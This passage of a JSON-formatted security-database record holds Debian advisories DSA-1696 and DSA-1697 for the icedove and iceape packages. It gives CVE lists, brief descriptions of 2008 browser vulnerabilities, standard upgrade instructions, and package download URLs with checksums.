http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_ia64.deb\n Size/MD5 checksum: 61352 6ea0c96ac063352e976c4466f6693445\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_ia64.deb\n Size/MD5 checksum: 75818 82b63c4e7a04d88563ebb026ab5442d7\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_ia64.deb\n Size/MD5 checksum: 3731302 69346f41cb47056702efc0681657c510\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_ia64.deb\n Size/MD5 checksum: 16577294 3146e1c829f3d194c388077931a47485\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mips.deb\n Size/MD5 checksum: 53214602 6207f3135c941b7348219ede580b6c92\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mips.deb\n Size/MD5 checksum: 194438 84bef6e50347e0421f667e1148f85a6d\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mips.deb\n Size/MD5 checksum: 49608 079ed1d622c23e8ef856e05f31435649\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mips.deb\n Size/MD5 checksum: 3951628 f88b22d4ed68158bacbd5c51faf8e563\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mips.deb\n Size/MD5 checksum: 60046 7afd997c7631d1e458a4c0075ba4cbbe\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mips.deb\n Size/MD5 checksum: 11625186 e9166ce3e1de56e78022e70a28bdd0e8\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 60396 3baa5cba57929c4401731de9039bb6c7\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 51774640 c89a79f9cbf93b583d1afd60ec8fc70d\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 11373928 e83d17a1d63b8857d49b1efc9d74d586\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 50710 7d8aa386b329e2d93f7fc85f245261a4\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 3686850 67e7b75dd18d74fb45b3278cafa88db1\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 193734 9522b8f3bf9570de7f99f7b0ae5744e0\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 194474 aede4ace924b89ae12e6556a8444cc11\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 62158 fef7361f1431e623e45fe8033060ab0d\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 53398506 c55370e9adb2b7d7f176ea43eea77f90\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 11822454 3f7a8180cb276529fa883c702f28840f\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 51334 ce1f2fb8863a23314f922a7b7fded0a1\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 3681454 f2597c093b57efdca38a5c9ba9fb6622\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_sparc.deb\n Size/MD5 checksum: 3676578 3fbc08c0bba5dd0f14bf160018ec7034\n http://security.debian.org/pool/updates/main/i/icedove/icedove-typeaheadfind_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_sparc.deb\n Size/MD5 checksum: 59830 f39bda160f8d21f97bdc46ff37000898\n http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_sparc.deb\n Size/MD5 checksum: 49828 9cd015183ad1200e00bb0a6b4a5b544a\n http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_sparc.deb\n Size/MD5 checksum: 50726490 7dae68f748ccc5102320f4850170f946\n http://security.debian.org/pool/updates/main/i/icedove/icedove_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_sparc.deb\n Size/MD5 checksum: 11132208 8f00b97ee223c42904e2af342222b363\n http://security.debian.org/pool/updates/main/i/icedove/icedove-inspector_1.5.0.13+1.5.0.15b.dfsg1+prepatch080614i-0etch1_sparc.deb\n Size/MD5 checksum: 191926 54388142eaa943f4a31934c0ee111a74\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2009-01-07T21:32:33", "title": "[SECURITY] [DSA 1696-1] New icedove packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:15:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-5500", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-5012", "CVE-2008-5018", "CVE-2008-1380", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-5021", "CVE-2008-5017", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-5014", "CVE-2008-4058", "CVE-2008-5022", "CVE-2008-5512", "CVE-2008-4068", "CVE-2008-5503", "CVE-2008-5511", "CVE-2008-5508", "CVE-2008-4061", "CVE-2008-5024", "CVE-2008-5507", "CVE-2008-4065", "CVE-2008-4582", "CVE-2008-5506"], "modified": "2009-01-07T21:32:33", "id": "DEBIAN:DSA-1696-1:A5184", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00003.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:15", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-browser_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-browser", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-calendar_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-calendar", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-chatzilla_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-chatzilla", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-gnome-support_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-psm_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-psm", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-dev_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-mailnews_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-mailnews", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-mailnews_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-mailnews", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-js-debugger_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-js-debugger", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-browser_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-browser", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-calendar_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-calendar", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-dbg_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-dev_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-chatzilla_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-chatzilla", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "iceape-dom-inspector_1.0.13~pre080614i-0etch1_all.deb", "packageName": "iceape-dom-inspector", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.0.13~pre080614i-0etch1", "arch": "all", "packageFilename": "mozilla-dom-inspector_1.0.13~pre080614i-0etch1_all.deb", "packageName": "mozilla-dom-inspector", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1697-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJanuary 07, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : iceape\nVulnerability : several vulnerabilities\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2008-0016 CVE-2008-0304 CVE-2008-2785 CVE-2008-2798 CVE-2008-2799 CVE-2008-2800\nCVE-2008-2801 CVE-2008-2802 CVE-2008-2803 CVE-2008-2805 CVE-2008-2807 CVE-2008-2808 CVE-2008-2809\nCVE-2008-2810 CVE-2008-2811 CVE-2008-2933 CVE-2008-3835 CVE-2008-3836 CVE-2008-3837 CVE-2008-4058\nCVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 CVE-2008-4065 CVE-2008-4067 CVE-2008-4068\nCVE-2008-4069 CVE-2008-4070 CVE-2008-5012 CVE-2008-5013 CVE-2008-5014 CVE-2008-5017 CVE-2008-0017\nCVE-2008-5021 CVE-2008-5022 CVE-2008-5500 CVE-2008-5503 CVE-2008-5506 CVE-2008-5507 CVE-2008-5508\nCVE-2008-5511 CVE-2008-5512\n\nSeveral remote vulnerabilities have been discovered in Iceape an\nunbranded version of the Seamonkey internet suite. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2008-0016\n\n Justin Schuh, Tom Cross and Peter Williams discovered a buffer\n overflow in the parser for UTF-8 URLs, which may lead to the\n execution of arbitrary code. (MFSA 2008-37)\n\nCVE-2008-0304\n\n It was discovered that a buffer overflow in MIME decoding can lead\n to the execution of arbitrary code. (MFSA 2008-26)\n\nCVE-2008-2785\n\n It was discovered that missing boundary checks on a reference\n counter for CSS objects can lead to the execution of arbitrary code.\n (MFSA 2008-34)\n\nCVE-2008-2798\n\n Devon Hubbard, Jesse Ruderman and Martijn Wargers discovered\n crashes in the layout engine, which might allow the execution of\n arbitrary code. (MFSA 2008-21)\n\nCVE-2008-2799\n\n Igor Bukanov, Jesse Ruderman and Gary Kwong discovered crashes in\n the Javascript engine, which might allow the execution of arbitrary\n code. (MFSA 2008-21)\n\nCVE-2008-2800\n\n "moz_bug_r_a4" discovered several cross-site scripting vulnerabilities.\n (MFSA 2008-22)\n\nCVE-2008-2801\n\n Collin Jackson and Adam Barth discovered that Javascript code\n could be executed in the context or signed JAR archives. (MFSA 2008-23)\n\nCVE-2008-2802\n\n "moz_bug_r_a4" discovered that XUL documements can escalate\n privileges by accessing the pre-compiled "fastload" file.\n (MFSA 2008-24)\n\nCVE-2008-2803\n\n "moz_bug_r_a4" discovered that missing input sanitising in the\n mozIJSSubScriptLoader.loadSubScript() function could lead to the\n execution of arbitrary code. Iceape itself is not affected, but\n some addons are. (MFSA 2008-25)\n\nCVE-2008-2805\n\n Claudio Santambrogio discovered that missing access validation in\n DOM parsing allows malicious web sites to force the browser to\n upload local files to the server, which could lead to information\n disclosure. (MFSA 2008-27)\n\nCVE-2008-2807\n\n Daniel Glazman discovered that a programming error in the code for\n parsing .properties files could lead to memory content being\n exposed to addons, which could lead to information disclosure.\n (MFSA 2008-29)\n\nCVE-2008-2808\n\n Masahiro Yamada discovered that file URLS in directory listings\n were insufficiently escaped. (MFSA 2008-30)\n\nCVE-2008-2809\n\n John G. Myers, Frank Benkstein and Nils Toedtmann discovered that\n alternate names on self-signed certificates were handled\n insufficiently, which could lead to spoofings of secure connections.\n (MFSA 2008-31)\n\nCVE-2008-2810\n\n It was discovered that URL shortcut files could be used to bypass the\n same-origin restrictions. This issue does not affect current Iceape,\n but might occur with additional extensions installed. (MFSA 2008-32)\n\nCVE-2008-2811\n\n Greg McManus discovered a crash in the block reflow code, which might\n allow the execution of arbitrary code. (MFSA 2008-33)\n\nCVE-2008-2933\n\n Billy Rios discovered that passing an URL containing a pipe symbol\n to Iceape can lead to Chrome privilege escalation. (MFSA 2008-35)\n\nCVE-2008-3835\n\n "moz_bug_r_a4" discovered that the same-origin check in\n nsXMLDocument::OnChannelRedirect() could be bypassed. (MFSA 2008-38)\n\nCVE-2008-3836\n\n "moz_bug_r_a4" discovered that several vulnerabilities in\n feedWriter could lead to Chrome privilege escalation. (MFSA 2008-39)\n\nCVE-2008-3837\n\n Paul Nickerson discovered that an attacker could move windows\n during a mouse click, resulting in unwanted action triggered by\n drag-and-drop. (MFSA 2008-40)\n\nCVE-2008-4058\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers. (MFSA 2008-41)\n\nCVE-2008-4059\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers. (MFSA 2008-41)\n\nCVE-2008-4060\n\n Olli Pettay and "moz_bug_r_a4" discovered a Chrome privilege\n escalation vulnerability in XSLT handling. (MFSA 2008-41)\n\nCVE-2008-4061\n\n Jesse Ruderman discovered a crash in the layout engine, which might\n allow the execution of arbitrary code. (MFSA 2008-42)\n\nCVE-2008-4062\n\n Igor Bukanov, Philip Taylor, Georgi Guninski and Antoine Labour\n discovered crashes in the Javascript engine, which might allow the\n execution of arbitrary code. (MFSA 2008-42)\n\nCVE-2008-4065\n\n Dave Reed discovered that some Unicode byte order marks are\n stripped from Javascript code before execution, which can result in\n code being executed, which were otherwise part of a quoted string.\n (MFSA 2008-43)\n\nCVE-2008-4067\n\n Boris Zbarsky discovered that resource: URls allow directory\n traversal when using URL-encoded slashes. (MFSA 2008-44)\n\nCVE-2008-4068\n\n Georgi Guninski discovered that resource: URLs could bypass local\n access restrictions. (MFSA 2008-44)\n\nCVE-2008-4069\n\n Billy Hoffman discovered that the XBM decoder could reveal\n uninitialised memory. (MFSA 2008-45)\n\nCVE-2008-4070\n\n It was discovered that a buffer overflow could be triggered via a\n long header in a news article, which could lead to arbitrary code\n execution. (MFSA 2008-46)\n\nCVE-2008-5012\n\n Georgi Guninski, Michal Zalewski and Chris Evan discovered that\n the canvas element could be used to bypass same-origin\n restrictions. (MFSA 2008-48)\n\nCVE-2008-5013\n\n It was discovered that insufficient checks in the Flash plugin glue\n code could lead to arbitrary code execution. (MFSA 2008-49)\n\nCVE-2008-5014\n\n Jesse Ruderman discovered that a programming error in the\n window.__proto__.__proto__ object could lead to arbitrary code\n execution. (MFSA 2008-50)\n\nCVE-2008-5017\n\n It was discovered that crashes in the layout engine could lead to\n arbitrary code execution. (MFSA 2008-52)\n\nCVE-2008-0017\n\n Justin Schuh discovered that a buffer overflow in http-index-format\n parser could lead to arbitrary code execution. (MFSA 2008-54)\n\nCVE-2008-5021\n\n It was discovered that a crash in the nsFrameManager might lead to\n the execution of arbitrary code. (MFSA 2008-55)\n\nCVE-2008-5022\n\n "moz_bug_r_a4" discovered that the same-origin check in\n nsXMLHttpRequest::NotifyEventListeners() could be bypassed.\n (MFSA 2008-56)\n\nCVE-2008-5024\n\n Chris Evans discovered that quote characters were improperly\n escaped in the default namespace of E4X documents. (MFSA 2008-58)\n\nCVE-2008-4582\n\n Liu Die Yu discovered an information leak through local shortcut\n files. (MFSA 2008-59)\n\nCVE-2008-5500\n\n Jesse Ruderman discovered that the layout engine is vulnerable to\n DoS attacks that might trigger memory corruption and an integer\n overflow. (MFSA 2008-60)\n\nCVE-2008-5503\n\n Boris Zbarsky discovered that an information disclosure attack could\n be performed via XBL bindings. (MFSA 2008-61)\n\nCVE-2008-5506\n\n Marius Schilder discovered that it is possible to obtain sensible\n data via a XMLHttpRequest. (MFSA 2008-64)\n\nCVE-2008-5507\n\n Chris Evans discovered that it is possible to obtain sensible data\n via a JavaScript URL. (MFSA 2008-65)\n\nCVE-2008-5508\n\n Chip Salzenberg discovered possible phishing attacks via URLs with\n leading whitespaces or control characters. (MFSA 2008-66)\n\nCVE-2008-5511\n\n It was discovered that it is possible to perform cross-site scripting\n attacks via an XBL binding to an "unloaded document." (MFSA 2008-68)\n\nCVE-2008-5512\n\n It was discovered that it is possible to run arbitrary JavaScript\n with chrome privileges via unknown vectors. (MFSA 2008-68)\n\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 1.0.13~pre080614i-0etch1.\n\nFor the upcoming stable distribution (lenny) distribution these problems\nwill be fixed soon.\n\nFor the unstable (sid) distribution these problems have been fixed in\nversion 1.1.14-1.\n\nWe recommend that you upgrade your iceape packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.13~pre080614i-0etch1.dsc\n Size/MD5 checksum: 2104 b780c722d772cde416bfbda0e6750e3f\n http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.13~pre080614i-0etch1.diff.gz\n Size/MD5 checksum: 2033694 fadf6ae5717e05ff353c52b8e90825d0\n http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.13~pre080614i.orig.tar.gz\n Size/MD5 checksum: 42978498 b5f28ad30d5e15dc67efa370c7f9ee59\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-mailnews_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29248 3c5939146bfc6801b54a5e0584dca482\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-calendar_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29224 8027c7b507f7029d558846ad1e38db99\n http://security.debian.org/pool/updates/main/i/iceape/iceape-chatzilla_1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 281076 80fcf72ee4e4392b44e32f052ea70456\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-psm_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29232 ffa20451394a1d05f5da58116f133916\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dev_1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 3667564 aec7efa1351f2f41289ec6edc5d1da6c\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-browser_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 30218 3a26ed7bbcdefc06ec0f34256733ad4e\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-dev_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29358 b764c962b7bc3a9fc2a2c6c723b3129c\n http://security.debian.org/pool/updates/main/i/iceape/mozilla_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29222 dc21b8434b9b72375e8df9fa94a7709d\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-js-debugger_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29260 9f827631e7c410da840ca7ae095ebe2d\n http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 30676 a508e9e68d99676fd897ecb1095486b7\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-chatzilla_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29244 33e0809ea09959c467e1379206e605ab\n http://security.debian.org/pool/updates/main/i/iceape/mozilla-dom-inspector_1.8+1.0.13~pre080614i-0etch1_all.deb\n Size/MD5 checksum: 29264 fc07419a1397db4a1f65f42123864c76\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_alpha.deb\n Size/MD5 checksum: 60708202 67b1488b6549084cccfe2939ad6da1c0\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_alpha.deb\n Size/MD5 checksum: 2282516 c3e6e1ec7cd869c1205a79de1e090d7a\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_alpha.deb\n Size/MD5 checksum: 56706 44defee7a96a0a632744acdec128e152\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_alpha.deb\n Size/MD5 checksum: 200546 69a5be2dfec4f6690041bad98e80331e\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_alpha.deb\n Size/MD5 checksum: 12894314 ae3d3ef615ea4e13363a274912e1e99c\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_alpha.deb\n Size/MD5 checksum: 629450 96d8b62fdaffdbd48ade90b1e3e4e032\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_amd64.deb\n Size/MD5 checksum: 2094958 d25528c803f38c309c74427d5e0769c1\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_amd64.deb\n Size/MD5 checksum: 11683136 aff467dd69f1272dbcc1be14f0d96295\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_amd64.deb\n Size/MD5 checksum: 55488 62268a914d78526df611190dbab5e6ca\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_amd64.deb\n Size/MD5 checksum: 612120 45ce3f797e175feff8cbd20526008f7b\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_amd64.deb\n Size/MD5 checksum: 59742704 2c7625187ee32f93a01b0f822face8f7\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_amd64.deb\n Size/MD5 checksum: 197202 50ea3e1f957a8c6ca761f651f25cba39\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_hppa.deb\n Size/MD5 checksum: 56794 383de80565c8737055cbb7f854bfda21\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_hppa.deb\n Size/MD5 checksum: 200226 f22a4d3ab31ce54792c41166669ecc66\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_hppa.deb\n Size/MD5 checksum: 60588594 5ddfcb5e1feca41bef601a181ab7c86c\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_hppa.deb\n Size/MD5 checksum: 13002074 0ba6c8340786bcd476e450fd9c227444\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_hppa.deb\n Size/MD5 checksum: 2352360 74c84da1042f6509e7061f64779d37a6\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_hppa.deb\n Size/MD5 checksum: 621258 e017d448d1cbdf589c4cbc1381187ff2\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_i386.deb\n Size/MD5 checksum: 10493838 6ae4594756d565e0e8cbd5df76011736\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_i386.deb\n Size/MD5 checksum: 192010 9cc79d018eedc49931af793d1828bd95\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_i386.deb\n Size/MD5 checksum: 58802216 6469dd02ef7db7da6e5ab347e6ce7d60\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_i386.deb\n Size/MD5 checksum: 1894534 519c11b7d16a9b18f2210808ae1d0d92\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_i386.deb\n Size/MD5 checksum: 50552 dd9e3a6356e265592d5eea54c4e44c21\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_i386.deb\n Size/MD5 checksum: 591248 2e54c039929b804d0d7d1fd5df38171a\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_ia64.deb\n Size/MD5 checksum: 664100 38ab3addca82ff3cd814265777814a89\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_ia64.deb\n Size/MD5 checksum: 206798 41237d984441d52d39fedc62d58514cf\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_ia64.deb\n Size/MD5 checksum: 59993870 48724db6f24e5b198ccd296ab5eae79d\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_ia64.deb\n Size/MD5 checksum: 15810684 ab38e3d118ee39b7f77bd0d6920f5f62\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_ia64.deb\n Size/MD5 checksum: 2819586 5b71efd5233db1081bc5c71bed2c19e5\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_ia64.deb\n Size/MD5 checksum: 64056 0841d4d6a5a5958a3ea3549f2536cbc7\n\nmips architecture (MIPS 